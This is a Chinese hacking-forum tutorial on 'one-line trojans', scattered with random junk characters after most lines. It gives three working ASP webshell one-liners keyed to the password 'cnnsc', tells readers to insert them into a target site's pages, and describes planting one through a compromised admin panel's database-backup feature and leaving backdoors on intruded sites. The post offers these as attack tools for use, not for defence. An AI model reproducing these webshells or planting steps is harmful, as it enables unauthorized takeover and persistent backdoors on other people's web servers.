- 帖子
- 131
- 积分
- 1083
- 威望
- 358
- 金钱
- 2450
- 在线时间
- 414 小时
|
一句话木马的使用
' u( q( q& `% o- ?* t+ f6 ]' V0 d6 Z" s) J
by:柔肠寸断 790653916 www.3ast.com.cn 不免费收点徒弟~~~+ J" d* t) G8 Q& V
; W# _' E# J9 m. S9 |* K. i5 [& ~# P: j, s9 x
1、咱们先弄懂怎么使用的。4 |% X8 X3 Q* }7 c0 t% ?1 U
" f8 o, X5 Z; l! v8 O! ]分为客户端和服务端$ o' @1 Z7 J: C' y( \! c( g
* d4 d( L7 M; x9 b, l. w; T$ H, ]5 G+ b: L+ R$ W+ e, u
客户端是连接上去的程序,也可以是网页
) D, }* o& t* P8 F) y) O+ v& v- x0 ], N9 U
http://www.3ast.com.cn/tool/yijuhua.html
8 g5 R) c0 L% I1 r2 d, g% y( Y3 M! X
服务端就是一段代码,代码里有对应的“密码”9 Z: C$ |1 J6 c1 O* f; C
! T9 g) l. |9 g
提供三个服务端:
8 e& ]! r: P1 {+ D/ h8 k1. <%eval request("cnnsc")%>
; k. w& p, q j$ k: @2. <%execute request("cnnsc")%> " b# G5 D& U8 e( N9 a! K/ q. F
3. <%execute(request("cnnsc"))%> 2 ~% z$ V$ R V- R2 f
7 x4 o- n5 F' Y/ g
cnnsc--密码8 F |2 H T* x. N
) F. D* r" Q F7 l& L4 C
我们只要把这个代码插入到对方网站的网页中就可以了
z+ P' y$ R( `0 |7 S" l/ Q3 ^1 N0 `$ x7 Z/ e" K+ T4 J8 ]) K! g
我演示下,用已经有的一个webshell添加一个asp文件,加上 <%eval request("cnnsc")%> ! o2 S8 R3 {4 S- Y
7 r6 B* R, {, E# e+ [- `换一个页面,添加过了。访问的时候一切正常,看链接
5 P' w0 ~2 f3 `; w7 x- u& `/ M) r* S! z+ i- F0 L
上传之后. _1 e& v; q; h- C( \' b
# ^( D" R3 K: w( M2 l
链接上去了4 k5 U& c" w6 y- Y' }
OK.这个就是链接的主要过程& y9 F# m+ m5 i b4 n6 j0 B
7 K% w+ [6 i8 `2 I5 t" L3 Z% e
- A* a1 w3 w1 c
1 p# O: i0 q6 h1 V: C+ r' J
% T) y& w7 O0 G8 W$ o8 f2、然后懂得哪里会用上、怎么用
) I$ p; r5 o: Z+ Q7 ]! |2 V$ a1 F- w/ F! S$ `6 ^
(1)有的时候我们进入了XXX的后台,后台有备份数据库,那么我们就可以在系统中插入这个一句话代码,任意地方,比如皮肤名称啊,文章标题啊,只要是会被写进数据库的就可以了,然后备份数据库成一个asp文件(也有php的一句话),然后链接就可以拿下来了
, a0 t& g- j- C! s. T5 X2 p" o8 Z4 S2 y7 J9 _3 v3 Z( q4 \
(2)可以给自己入侵的网站留下后门。。。。$ u3 l4 f' x6 {9 d
) j* b3 U8 Y; H5 r3 {
(3)我再想想。。。哎,想不出,还是要自己多多实践。。。。. F' R( ^4 d/ I7 [
& m* x' N5 D& Q g好了,教程到此结束,不懂的可以再来问我。。。790653916 |
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|